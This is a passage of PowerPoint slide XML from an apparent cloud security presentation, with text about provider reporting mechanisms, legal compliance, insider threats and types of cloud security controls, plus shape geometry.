              <a:rPr dirty="0" sz="2200" spc="-9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44484E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2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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cloud.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>
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2761615">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-130">
                <a:solidFill>
                  <a:srgbClr val="44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>reporting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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ensured</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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that</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2761615">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>informs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>whether</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>critical</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>tasks</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>completed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>not.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44515" y="6062853"/>
            <a:ext cx="8380730" cy="191198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699770" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Legal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484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0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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>compliance</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>responsibilities</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484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14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44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>provider</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>essential</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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any</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>breaches.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Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="591185">
              <a:lnSpc>
                <a:spcPct val="100400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484E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55">
                <a:solidFill>
                  <a:srgbClr val="44484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30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ider</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>thr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="44484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30">
                <a:solidFill>
                  <a:srgbClr val="44484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20">
                <a:solidFill>
                  <a:srgbClr val="44484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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="44484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an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484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0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th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2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admi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484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60">
                <a:solidFill>
                  <a:srgbClr val="44484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110">
                <a:solidFill>
                  <a:srgbClr val="44484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30">
                <a:solidFill>
                  <a:srgbClr val="44484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30">
                <a:solidFill>
                  <a:srgbClr val="44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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0">
                <a:solidFill>
                  <a:srgbClr val="44484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10">
                <a:solidFill>
                  <a:srgbClr val="44484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75">
                <a:solidFill>
                  <a:srgbClr val="44484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8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>working</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>he  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>provider,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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their</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>benefit.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827276" y="4273296"/>
            <a:ext cx="2691765" cy="2693035"/>
            <a:chOff x="1827276" y="4273296"/>
            <a:chExt cx="2691765" cy="2693035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1827276" y="4273296"/>
              <a:ext cx="2691765" cy="2693035"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2691765" h="2693034">
                  <a:moveTo>
                    <a:pt x="1345692" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1297426" y="849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249588" y="3380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202206" y="7564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155308" y="13371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1108923" y="20774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063079" y="29744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1017806" y="40253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973130" y="52271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929081" y="65771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885688" y="80724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842978" y="97102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800980" y="114876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759723" y="134017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719234" y="154498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679544" y="176289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640679" y="199362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602669" y="223689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565541" y="249241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529325" y="275990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494049" y="303907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459741" y="332964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426430" y="363132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394144" y="394382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362912" y="426687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332762" y="460017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303722" y="494345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275822" y="529642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249089" y="565879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223552" y="603027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199240" y="641059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176181" y="679946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154403" y="719659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133935" y="760170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114805" y="801450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97042" y="843472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80674" y="886205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65730" y="929622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52239" y="973695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40228" y="1018395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29726" y="1063693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20761" y="1109561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13363" y="1155971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7559" y="1202893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3378" y="1250300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="849" y="1298163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1346453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="849" y="1394744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3378" y="1442607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7559" y="1490014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13363" y="1536936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20761" y="1583346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29726" y="1629214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40228" y="1674512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52239" y="1719212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65730" y="1763285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80674" y="1806702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97042" y="1849435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114805" y="1891457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133935" y="1932737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154403" y="1973248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176181" y="2012961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199240" y="2051848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223552" y="2089880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249089" y="2127028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275822" y="2163265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303722" y="2198562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332762" y="2232890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362912" y="2266220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394144" y="2298525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426430" y="2329775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459741" y="2359943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494049" y="2389000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529325" y="2416917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565541" y="2443666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602669" y="2469218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640679" y="2493545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679544" y="2516618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719234" y="2538409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759723" y="2558890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800980" y="2578031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842978" y="2595805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885688" y="2612183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929081" y="2627136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973130" y="2640636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1017806" y="2652654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063079" y="2663163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1108923" y="2672133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155308" y="2679536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202206" y="2685343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249588" y="2689527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1297426" y="2692058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1345692" y="2692908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393957" y="2692058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1441795" y="2689527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1489177" y="2685343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1536075" y="2679536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1582460" y="2672133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1628304" y="2663163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1673577" y="2652654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1718253" y="2640636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1762302" y="2627136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805695" y="2612183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848405" y="2595805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890403" y="2578031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931660" y="2558890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1972149" y="2538409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011839" y="2516618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2050704" y="2493545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088714" y="2469218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2125842" y="2443666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162058" y="2416917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2197334" y="2389000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231642" y="2359943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264953" y="2329775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2297239" y="2298525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2328471" y="2266220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2358621" y="2232890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2387661" y="2198562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415561" y="2163265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442294" y="2127028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467831" y="2089880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2492143" y="2051848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2515202" y="2012961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536980" y="1973248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2557448" y="1932737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576578" y="1891457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2594341" y="1849435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2610709" y="1806702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625653" y="1763285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639144" y="1719212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2651155" y="1674512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661657" y="1629214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2670622" y="1583346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2678020" y="1536936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2683824" y="1490014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2688005" y="1442607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2690534" y="1394744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2691384" y="1346453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2690534" y="1298163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2688005" y="1250300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2683824" y="1202893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2678020" y="1155971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2670622" y="1109561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661657" y="1063693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2651155" y="1018395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639144" y="973695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625653" y="929622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2610709" y="886205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2594341" y="843472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576578" y="801450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2557448" y="760170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536980" y="719659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2515202" y="679946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2492143" y="641059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467831" y="603027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442294" y="565879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415561" y="529642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2387661" y="494345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2358621" y="460017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2328471" y="426687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2297239" y="394382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264953" y="363132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231642" y="332964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2197334" y="303907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162058" y="275990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2125842" y="249241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088714" y="223689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2050704" y="199362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011839" y="176289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1972149" y="154498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931660" y="134017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890403" y="114876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848405" y="97102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805695" y="80724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1762302" y="65771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1718253" y="52271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1673577" y="40253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1628304" y="29744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1582460" y="20774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1536075" y="13371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1489177" y="7564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1441795" y="3380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393957" y="849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1345692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9360" y="4983480"/>
              <a:ext cx="1371600" cy="13716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43676" y="306451"/>
            <a:ext cx="41687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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Controls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06567" y="760476"/>
            <a:ext cx="5724144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57120" y="1933193"/>
            <a:ext cx="1194625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Clouds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use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security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controls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like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on-premise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networks.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Types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cloud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security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controls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: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847469" y="3295269"/>
            <a:ext cx="12563475" cy="3428365"/>
            <a:chOff x="1847469" y="3295269"/>
            <a:chExt cx="12563475" cy="3428365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1869186" y="3304794"/>
              <a:ext cx="4319270" cy="672465"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="672464">
                  <a:moveTo>
                    <a:pt x="4207002" y="0"/>
                  </a:moveTo>
